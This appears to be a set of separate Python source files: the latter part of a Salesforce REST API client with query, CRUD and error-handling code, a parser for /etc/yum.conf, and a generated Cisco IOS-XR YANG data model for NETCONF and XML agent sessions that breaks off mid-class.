+ \'sobjects/User/%s/password\' % user\n params = { \'NewPassword\' : password, }\n\n result = self.request.post(url, headers=self.headers, data=json.dumps(params))\n\n # salesforce return 204 No Content when the request is successful\n if result.status_code != 200 and result.status_code != 204:\n raise SalesforceGeneralError(url,\n \'User\',\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n def setPassword(self, user, password):\n import warnings\n warnings.warn(\n ""This method has been deprecated. Please use set_password instread."", DeprecationWarning)\n return self.set_password(user, password)\n\n # Generic Rest Function\n def restful(self, path, params):\n """"""Allows you to make a direct REST call if you know the path\n\n Arguments:\n\n * path: The path of the request\n Example: sobjects/User/ABC123/password\'\n * params: dict of parameters to pass to the path\n """"""\n\n url = self.base_url + path\n result = self.request.get(url, headers=self.headers, params=params)\n if result.status_code != 200:\n raise SalesforceGeneralError(url,\n path,\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n # Search Functions\n def search(self, search):\n """"""Returns the result of a Salesforce search as a dict decoded from\n the Salesforce response JSON payload.\n\n Arguments:\n\n * search -- the fully formatted SOSL search string, e.g.\n `FIND {Waldo}`\n """"""\n url = self.base_url + \'search/\'\n\n # `requests` will correctly encode the query string passed as `params`\n params = {\'q\': search}\n result = self.request.get(url, headers=self.headers, params=params)\n if result.status_code != 200:\n raise SalesforceGeneralError(url,\n \'search\',\n result.status_code,\n result.content)\n json_result = result.json(object_pairs_hook=OrderedDict)\n if len(json_result) == 0:\n return None\n else:\n return json_result\n\n def quick_search(self, search):\n """"""Returns the result of a Salesforce search as a dict decoded from\n the Salesforce response JSON payload.\n\n Arguments:\n\n * search -- the non-SOSL search string, e.g. `Waldo`. This search\n string will be wrapped to read `FIND {Waldo}` before being\n sent to Salesforce\n """"""\n search_string = u\'FIND {{{search_string}}}\'.format(search_string=search)\n return self.search(search_string)\n\n # Query Handler\n def query(self, query, **kwargs):\n """"""Return the result of a Salesforce SOQL query as a dict decoded from\n the Salesforce response JSON payload.\n\n Arguments:\n\n * query -- the SOQL query to send to Salesforce, e.g.\n `SELECT Id FROM Lead WHERE Email = dummy@email.com""`\n """"""\n url = self.base_url + \'query/\'\n params = {\'q\': query}\n # `requests` will correctly encode the query string passed as `params`\n result = self.request.get(url, headers=self.headers, params=params, **kwargs)\n\n if result.status_code != 200:\n _exception_handler(result)\n\n return result.json(object_pairs_hook=OrderedDict)\n\n def query_more(self, next_records_identifier, identifier_is_url=False, **kwargs):\n """"""Retrieves more results from a query that returned more results\n than the batch maximum. Returns a dict decoded from the Salesforce\n response JSON payload.\n\n Arguments:\n\n * next_records_identifier -- either the Id of the next Salesforce\n object in the result, or a URL to the\n next record in the result.\n * identifier_is_url -- True if `next_records_identifier` should be\n treated as a URL, False if\n `next_records_identifer` should be treated as\n an Id.\n """"""\n if identifier_is_url:\n # Don\'t use `self.base_url` here because the full URI is provided\n url = (u\'https://{instance}{next_record_url}\'\n .format(instance=self.sf_instance,\n next_record_url=next_records_identifier))\n else:\n url = self.base_url + \'query/{next_record_id}\'\n url = url.format(next_record_id=next_records_identifier)\n result = self.request.get(url, headers=self.headers, **kwargs)\n\n if result.status_code != 200:\n _exception_handler(result)\n\n return result.json(object_pairs_hook=OrderedDict)\n\n def query_all(self, query, **kwargs):\n """"""Returns the full set of results for the `query`. This is a\n convenience wrapper around `query(...)` and `query_more(...)`.\n\n The returned dict is the decoded JSON payload from the final call to\n Salesforce, but with the `totalSize` field representing the full\n number of results retrieved and the `records` list representing the\n full list of records retrieved.\n\n Arguments\n\n * query -- the SOQL query to send to Salesforce, e.g.\n `SELECT Id FROM Lead WHERE Email = dummy@email.com""`\n """"""\n def get_all_results(previous_result, **kwargs):\n """"""Inner function for recursing until there are no more results.\n\n Returns the full set of results that will be the return value for\n `query_all(...)`\n\n Arguments:\n\n * previous_result -- the modified result of previous calls to\n Salesforce for this query\n """"""\n if previous_result[\'done\']:\n return previous_result\n else:\n result = self.query_more(previous_result[\'nextRecordsUrl\'],\n identifier_is_url=True, **kwargs)\n result[\'totalSize\'] += previous_result[\'totalSize\']\n # Include the new list of records with the previous list\n previous_result[\'records\'].extend(result[\'records\'])\n result[\'records\'] = previous_result[\'records\']\n # Continue the recursion\n return get_all_results(result, **kwargs)\n\n # Make the initial query to Salesforce\n result = self.query(query, **kwargs)\n # The number of results might have exceeded the Salesforce batch limit\n # so check whether there are more results and retrieve them if so.\n return get_all_results(result, **kwargs)\n\n def apexecute(self, action, method=\'GET\', data=None, **kwargs):\n """"""Makes an HTTP request to an APEX REST endpoint\n\n Arguments:\n\n * action -- The REST endpoint for the request.\n * method -- HTTP method for the request (default GET)\n * data -- A dict of parameters to send in a POST / PUT request\n * kwargs -- Additional kwargs to pass to `requests.request`\n """"""\n result = self._call_salesforce(method, self.apex_url + action,\n data=json.dumps(data), **kwargs)\n\n if result.status_code == 200:\n try:\n response_content = result.json()\n except Exception:\n response_content = result.text\n return response_content\n\n def _call_salesforce(self, method, url, **kwargs):\n """"""Utility method for performing HTTP call to Salesforce.\n\n Returns a `requests.result` object.\n """"""\n result = self.request.request(method, url, headers=self.headers, **kwargs)\n\n if result.status_code >= 300:\n _exception_handler(result)\n\n return result\n\n\nclass SFType(object):\n """"""An interface to a specific type of SObject""""""\n\n def __init__(self, object_name, session_id, sf_instance, sf_version=\'27.0\', proxies=None):\n """"""Initialize the instance with the given parameters.\n\n Arguments:\n\n * object_name -- the name of the type of SObject this represents,\n e.g. `Lead` or `Contact`\n * session_id -- the session ID for authenticating to Salesforce\n * sf_instance -- the domain of the instance of Salesforce to use\n * sf_version -- the version of the Salesforce API to use\n * proxies -- the optional map of scheme to proxy server\n """"""\n self.session_id = session_id\n self.name = object_name\n self.request = requests.Session()\n self.request.proxies = proxies\n\n self.base_url = (u\'https://{instance}/services/data/v{sf_version}/sobjects/{object_name}/\'\n .format(instance=sf_instance,\n object_name=object_name,\n sf_version=sf_version))\n\n def metadata(self):\n """"""Returns the result of a GET to `.../{object_name}/` as a dict\n decoded from the JSON payload returned by Salesforce.\n """"""\n result = self._call_salesforce(\'GET\', self.base_url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def describe(self):\n """"""Returns the result of a GET to `.../{object_name}/describe` as a\n dict decoded from the JSON payload returned by Salesforce.\n """"""\n result = self._call_salesforce(\'GET\', self.base_url + \'describe\')\n return result.json(object_pairs_hook=OrderedDict)\n\n def describe_layout(self, record_id):\n """"""Returns the result of a GET to `.../{object_name}/describe/layouts/` as a\n dict decoded from the JSON payload returned by Salesforce.\n """"""\n result = self._call_salesforce(\'GET\', self.base_url + \'describe/layouts/\' + record_id)\n return result.json(object_pairs_hook=OrderedDict)\n\n def get(self, record_id):\n """"""Returns the result of a GET to `.../{object_name}/{record_id}` as a\n dict decoded from the JSON payload returned by Salesforce.\n\n Arguments:\n\n * record_id -- the Id of the SObject to get\n """"""\n result = self._call_salesforce(\'GET\', self.base_url + record_id)\n return result.json(object_pairs_hook=OrderedDict)\n\n def get_by_custom_id(self, custom_id_field, custom_id):\n """"""Returns the result of a GET to `.../{object_name}/{custom_id_field}/{custom_id}` as a\n dict decoded from the JSON payload returned by Salesforce.\n\n Arguments:\n\n * custom_id_field -- the API name of a custom field that was defined as an External ID\n * custom_id - the External ID value of the SObject to get\n """"""\n custom_url = self.base_url + \'{custom_id_field}/{custom_id}\'.format(\n custom_id_field=custom_id_field, custom_id=custom_id)\n result = self._call_salesforce(\'GET\', custom_url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def create(self, data):\n """"""Creates a new SObject using a POST to `.../{object_name}/`.\n\n Returns a dict decoded from the JSON payload returned by Salesforce.\n\n Arguments:\n\n * data -- a dict of the data to create the SObject from. It will be\n JSON-encoded before being transmitted.\n """"""\n result = self._call_salesforce(\'POST\', self.base_url,\n data=json.dumps(data))\n return result.json(object_pairs_hook=OrderedDict)\n\n def upsert(self, record_id, data, raw_response=False):\n """"""Creates or updates an SObject using a PATCH to\n `.../{object_name}/{record_id}`.\n\n If `raw_response` is false (the default), returns the status code\n returned by Salesforce. Otherwise, return the `requests.Response`\n object.\n\n Arguments:\n\n * record_id -- an identifier for the SObject as described in the\n Salesforce documentation\n * data -- a dict of the data to create or update the SObject from. It\n will be JSON-encoded before being transmitted.\n * raw_response -- a boolean indicating whether to return the response\n directly, instead of the status code.\n """"""\n result = self._call_salesforce(\'PATCH\', self.base_url + record_id,\n data=json.dumps(data))\n return self._raw_response(result, raw_response)\n\n def update(self, record_id, data, raw_response=False):\n """"""Updates an SObject using a PATCH to\n `.../{object_name}/{record_id}`.\n\n If `raw_response` is false (the default), returns the status code\n returned by Salesforce. Otherwise, return the `requests.Response`\n object.\n\n Arguments:\n\n * record_id -- the Id of the SObject to update\n * data -- a dict of the data to update the SObject from. It will be\n JSON-encoded before being transmitted.\n * raw_response -- a boolean indicating whether to return the response\n directly, instead of the status code.\n """"""\n result = self._call_salesforce(\'PATCH\', self.base_url + record_id,\n data=json.dumps(data))\n return self._raw_response(result, raw_response)\n\n def delete(self, record_id, raw_response=False):\n """"""Deletes an SObject using a DELETE to\n `.../{object_name}/{record_id}`.\n\n If `raw_response` is false (the default), returns the status code\n returned by Salesforce. Otherwise, return the `requests.Response`\n object.\n\n Arguments:\n\n * record_id -- the Id of the SObject to delete\n * raw_response -- a boolean indicating whether to return the response\n directly, instead of the status code.\n """"""\n result = self._call_salesforce(\'DELETE\', self.base_url + record_id)\n return self._raw_response(result, raw_response)\n\n def deleted(self, start, end):\n """"""Use the SObject Get Deleted resource to get a list of deleted records for the specified object.\n .../deleted/?start=2013-05-05T00:00:00+00:00&end=2013-05-10T00:00:00+00:00\n\n * start -- start datetime object\n * end -- end datetime object\n """"""\n url = self.base_url + \'deleted/?start={start}&end={end}\'.format(\n start=date_to_iso8601(start), end=date_to_iso8601(end))\n result = self._call_salesforce(\'GET\', url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def updated(self, start, end):\n """"""Use the SObject Get Updated resource to get a list of updated (modified or added)\n records for the specified object.\n\n .../updated/?start=2014-03-20T00:00:00+00:00&end=2014-03-22T00:00:00+00:00\n\n * start -- start datetime object\n * end -- end datetime object\n """"""\n url = self.base_url + \'updated/?start={start}&end={end}\'.format(\n start=date_to_iso8601(start), end=date_to_iso8601(end))\n result = self._call_salesforce(\'GET\', url)\n return result.json(object_pairs_hook=OrderedDict)\n\n def _call_salesforce(self, method, url, **kwargs):\n """"""Utility method for performing HTTP call to Salesforce.\n\n Returns a `requests.result` object.\n """"""\n headers = {\n \'Content-Type\': \'application/json\',\n \'Authorization\': \'Bearer \' + self.session_id,\n \'X-PrettyPrint\': \'1\'\n }\n result = self.request.request(method, url, headers=headers, **kwargs)\n\n if result.status_code >= 300:\n _exception_handler(result, self.name)\n\n return result\n\n def _raw_response(self, response, body_flag):\n """"""Utility method for processing the response and returning either the\n status code or the response object.\n\n Returns either an `int` or a `requests.Response` object.\n """"""\n if not body_flag:\n return response.status_code\n else:\n return response\n\n\nclass SalesforceAPI(Salesforce):\n """"""Depreciated SalesforceAPI Instance\n\n This class implements the Username/Password Authentication Mechanism using Arguments\n It has since been surpassed by the \'Salesforce\' class, which relies on kwargs\n\n """"""\n def __init__(self, username, password, security_token, sandbox=False,\n sf_version=\'27.0\'):\n """"""Initialize the instance with the given parameters.\n\n Arguments:\n\n * username -- the Salesforce username to use for authentication\n * password -- the password for the username\n * security_token -- the security token for the username\n * sandbox -- True if you want to login to `test.salesforce.com`, False\n if you want to login to `login.salesforce.com`.\n * sf_version -- the version of the Salesforce API to use, for example\n ""27.0""\n """"""\n import warnings\n warnings.warn(\n ""Use of login arguments has been depreciated. Please use kwargs"",\n DeprecationWarning\n )\n\n super(SalesforceAPI, self).__init__(username=username,\n password=password,\n security_token=security_token,\n sandbox=sandbox,\n version=sf_version)\n\n\ndef _exception_handler(result, name=""""):\n """"""Exception router. Determines which error to raise for bad results""""""\n try:\n response_content = result.json()\n except Exception:\n response_content = result.text\n\n exc_map = {\n 300: SalesforceMoreThanOneRecord,\n 400: SalesforceMalformedRequest,\n 401: SalesforceExpiredSession,\n 403: SalesforceRefusedRequest,\n 404: SalesforceResourceNotFound,\n }\n exc_cls = exc_map.get(result.status_code, SalesforceGeneralError)\n\n raise exc_cls(result.url, result.status_code, name, response_content)\n\n\nclass SalesforceMoreThanOneRecord(SalesforceError):\n """"""\n Error Code: 300\n The value returned when an external ID exists in more than one record. The\n response body contains the list of matching records.\n """"""\n message = u""More than one record for {url}. Response content: {content}""\n\n\nclass SalesforceMalformedRequest(SalesforceError):\n """"""\n Error Code: 400\n The request couldn\'t be understood, usually becaue the JSON or XML body contains an error.\n """"""\n message = u""Malformed request {url}. Response content: {content}""\n\n\nclass SalesforceExpiredSession(SalesforceError):\n """"""\n Error Code: 401\n The session ID or OAuth token used has expired or is invalid. The response\n body contains the message and errorCode.\n """"""\n message = u""Expired session for {url}. Response content: {content}""\n\n\nclass SalesforceRefusedRequest(SalesforceError):\n """"""\n Error Code: 403\n The request has been refused. Verify that the logged-in user has\n appropriate permissions.\n """"""\n message = u""Request refused for {url}. Response content: {content}""\n\n\nclass SalesforceResourceNotFound(SalesforceError):\n """"""\n Error Code: 404\n The requested resource couldn\'t be found. Check the URI for errors, and\n verify that there are no sharing issues.\n """"""\n message = u\'Resource {name} Not Found. Response content: {content}\'\n\n def __str__(self):\n return self.message.format(name=self.resource_name,\n content=self.content)\n\n\nclass SalesforceGeneralError(SalesforceError):\n """"""\n A non-specific Salesforce error.\n """"""\n message = u\'Error Code {status}. Response content: {content}\'\n\n def __str__(self):\n return self.message.format(status=self.status, content=self.content)\n', '""""""\nYumConf - file ``/etc/yum.conf``\n================================\n\nThis module provides parsing for the ``/etc/yum.conf`` file.\nThe ``YumConf`` class parses the information in the file\n``/etc/yum.conf``. See the ``IniConfigFile`` class for more\ninformation on attributes and methods.\n\nSample input data looks like::\n\n [main]\n\n cachedir=/var/cache/yum/$basearch/$releasever\n keepcache=0\n debuglevel=2\n logfile=/var/log/yum.log\n exactarch=1\n obsoletes=1\n gpgcheck=1\n plugins=1\n installonly_limit=3\n\n [rhel-7-server-rpms]\n\n metadata_expire = 86400\n baseurl = https://cdn.redhat.com/content/rhel/server/7/$basearch\n name = Red Hat Enterprise Linux 7 Server (RPMs)\n gpgkey = PI:KEY\n enabled = 1\n gpgcheck = 1\n\nExamples:\n\n >>> yconf = shared[YumConf]\n >>> yconf.defaults()\n {\'admin_token\': \'ADMIN\', \'compute_port\': \'8774\'}\n >>> \'main\' in yconf\n True\n >>> \'rhel-7-server-rpms\' in yconf\n True\n >>> yconf.has_option(\'main\', \'gpgcheck\')\n True\n >>> yconf.has_option(\'main\', \'foo\')\n False\n >>> yconf.get(\'rhel-7-server-rpms\', \'enabled\')\n \'1\'\n >>> yconf.items(\'main\')\n {\'plugins\': \'1\',\n \'keepcache\': \'0\',\n \'cachedir\': \'/var/cache/yum/$basearch/$releasever\',\n \'exactarch\': \'1\',\n \'obsoletes\': \'1\',\n \'installonly_limit\': \'3\',\n \'debuglevel\': \'2\',\n \'gpgcheck\': \'1\',\n \'logfile\': \'/var/log/yum.log\'}\n""""""\n\nfrom insights.contrib.ConfigParser import NoOptionError\nfrom .. import parser, IniConfigFile\nfrom insights.specs import yum_conf\n\n\n@parser(yum_conf)\nclass YumConf(IniConfigFile):\n """"""Parse contents of file ``/etc/yum.conf``.""""""\n def parse_content(self, content):\n super(YumConf, self).parse_content(content)\n # File /etc/yum.conf may contain repos definitions.\n # Keywords \'gpgkey\' and \'baseurl\' might contain multiple\n # values separated by comma. Convert those values into a list.\n for section in self.sections():\n for key in (\'gpgkey\', \'baseurl\'):\n try:\n value = self.get(section, key)\n if value and isinstance(value, str):\n self.data.set(section, key, value.split(\',\'))\n except NoOptionError:\n pass\n', '"""""" Cisco_IOS_XR_man_xml_ttyagent_oper \n\nThis module contains a collection of YANG definitions\nfor Cisco IOS\\-XR man\\-xml\\-ttyagent package operational data.\n\nThis module contains definitions\nfor the following management objects\\:\n netconf\\: NETCONF operational information\n xr\\-xml\\: xr xml\n\nCopyright (c) 2013\\-2016 by Cisco Systems, Inc.\nAll rights reserved.\n\n""""""\n\n\nimport re\nimport collections\n\nfrom enum import Enum\n\nfrom ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict\n\nfrom ydk.errors import YPYError, YPYModelError\n\n\n\nclass XrXmlSessionAlarmRegisterEnum(Enum):\n """"""\n XrXmlSessionAlarmRegisterEnum\n\n AlarmNotify\n\n .. data:: registered = 1\n\n \tRegistered\n\n .. data:: not_registered = 2\n\n \tNotRegistered\n\n """"""\n\n registered = 1\n\n not_registered = 2\n\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXmlSessionAlarmRegisterEnum\']\n\n\nclass XrXmlSessionStateEnum(Enum):\n """"""\n XrXmlSessionStateEnum\n\n SessionState\n\n .. data:: idle = 1\n\n \tIdle\n\n .. data:: busy = 2\n\n \tBusy\n\n """"""\n\n idle = 1\n\n busy = 2\n\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXmlSessionStateEnum\']\n\n\n\nclass Netconf(object):\n """"""\n NETCONF operational information\n \n .. attribute:: agent\n \n \tNETCONF agent operational information\n \t**type**\\: :py:class:`Agent `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.agent = Netconf.Agent()\n self.agent.parent = self\n\n\n class Agent(object):\n """"""\n NETCONF agent operational information\n \n .. attribute:: tty\n \n \tNETCONF agent over TTY\n \t**type**\\: :py:class:`Tty `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.tty = Netconf.Agent.Tty()\n self.tty.parent = self\n\n\n class Tty(object):\n """"""\n NETCONF agent over TTY\n \n .. attribute:: sessions\n \n \tSession information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = Netconf.Agent.Tty.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n Session information\n \n .. attribute:: session\n \n \tSession information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n Session information\n \n .. attribute:: session_id \n \n \tSession ID\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent.Tty.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent.Tty.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent.Tty\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.tty is not None and self.tty._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf.Agent\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'/Cisco-IOS-XR-man-xml-ttyagent-oper:netconf\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.agent is not None and self.agent._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'Netconf\'][\'meta_info\']\n\n\nclass XrXml(object):\n """"""\n xr xml\n \n .. attribute:: agent\n \n \tXML agents\n \t**type**\\: :py:class:`Agent `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.agent = XrXml.Agent()\n self.agent.parent = self\n\n\n class Agent(object):\n """"""\n XML agents\n \n .. attribute:: default\n \n \tDefault sessions information\n \t**type**\\: :py:class:`Default `\n \n .. attribute:: ssl\n \n \tSSL sessions information\n \t**type**\\: :py:class:`Ssl `\n \n .. attribute:: tty\n \n \tTTY sessions information\n \t**type**\\: :py:class:`Tty `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.default = XrXml.Agent.Default()\n self.default.parent = self\n self.ssl = XrXml.Agent.Ssl()\n self.ssl.parent = self\n self.tty = XrXml.Agent.Tty()\n self.tty.parent = self\n\n\n class Tty(object):\n """"""\n TTY sessions information\n \n .. attribute:: sessions\n \n \tsessions information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = XrXml.Agent.Tty.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n sessions information\n \n .. attribute:: session\n \n \txml sessions information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n xml sessions information\n \n .. attribute:: session_id \n \n \tSession Id\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n \tAdmin config session ID\n \t**type**\\: str\n \n .. attribute:: alarm_notification\n \n \tis the session registered for alarm notifications\n \t**type**\\: :py:class:`XrXmlSessionAlarmRegisterEnum `\n \n .. attribute:: client_address\n \n \tip address of the client\n \t**type**\\: str\n \n .. attribute:: client_port\n \n \tclient\'s port\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n .. attribute:: config_session_id\n \n \tConfig session ID\n \t**type**\\: str\n \n .. attribute:: elapsed_time\n \n \t Elapsed time(seconds) since a session is created\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: last_state_change\n \n \tTime(seconds) since last session state change happened \n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: start_time\n \n \tsession start time in seconds since the Unix Epoch\n \t**type**\\: int\n \n \t**range:** 0..4294967295\n \n \t**units**\\: second\n \n .. attribute:: state\n \n \tstate of the session idle/busy\n \t**type**\\: :py:class:`XrXmlSessionStateEnum `\n \n .. attribute:: username\n \n \tUsername\n \t**type**\\: str\n \n .. attribute:: vrf_name\n \n \tVRF name \n \t**type**\\: str\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session_id = None\n self.admin_config_session_id = None\n self.alarm_notification = None\n self.client_address = None\n self.client_port = None\n self.config_session_id = None\n self.elapsed_time = None\n self.last_state_change = None\n self.start_time = None\n self.state = None\n self.username = None\n self.vrf_name = None\n\n @property\n def _common_path(self):\n if self.session_id is None:\n raise YPYModelError(\'Key property session_id is None\')\n\n return \'PI:KEY:session[Cisco-IOS-XR-man-xml-ttyagent-oper:session-id = \' + str(self.session_id) + \']\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session_id is not None:\n return True\n\n if self.admin_config_session_id is not None:\n return True\n\n if self.alarm_notification is not None:\n return True\n\n if self.client_address is not None:\n return True\n\n if self.client_port is not None:\n return True\n\n if self.config_session_id is not None:\n return True\n\n if self.elapsed_time is not None:\n return True\n\n if self.last_state_change is not None:\n return True\n\n if self.start_time is not None:\n return True\n\n if self.state is not None:\n return True\n\n if self.username is not None:\n return True\n\n if self.vrf_name is not None:\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Tty.Sessions.Session\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.session is not None:\n for child_ref in self.session:\n if child_ref._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Tty.Sessions\'][\'meta_info\']\n\n @property\n def _common_path(self):\n\n return \'PI:KEY\'\n\n def is_config(self):\n \'\'\' Returns True if this instance represents config data else returns False \'\'\'\n return False\n\n def _has_data(self):\n if self.sessions is not None and self.sessions._has_data():\n return True\n\n return False\n\n @staticmethod\n def _meta_info():\n from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_man_xml_ttyagent_oper as meta\n return meta._meta_table[\'XrXml.Agent.Tty\'][\'meta_info\']\n\n\n class Default(object):\n """"""\n Default sessions information\n \n .. attribute:: sessions\n \n \tsessions information\n \t**type**\\: :py:class:`Sessions `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.sessions = XrXml.Agent.Default.Sessions()\n self.sessions.parent = self\n\n\n class Sessions(object):\n """"""\n sessions information\n \n .. attribute:: session\n \n \txml sessions information\n \t**type**\\: list of :py:class:`Session `\n \n \n\n """"""\n\n _prefix = \'man-xml-ttyagent-oper\'\n _revision = \'2015-07-30\'\n\n def __init__(self):\n self.parent = None\n self.session = YList()\n self.session.parent = self\n self.session.name = \'session\'\n\n\n class Session(object):\n """"""\n xml sessions information\n \n .. attribute:: session_id \n \n \tSession Id\n \t**type**\\: int\n \n \t**range:** \\-2147483648..2147483647\n \n .. attribute:: admin_config_session_id\n \n 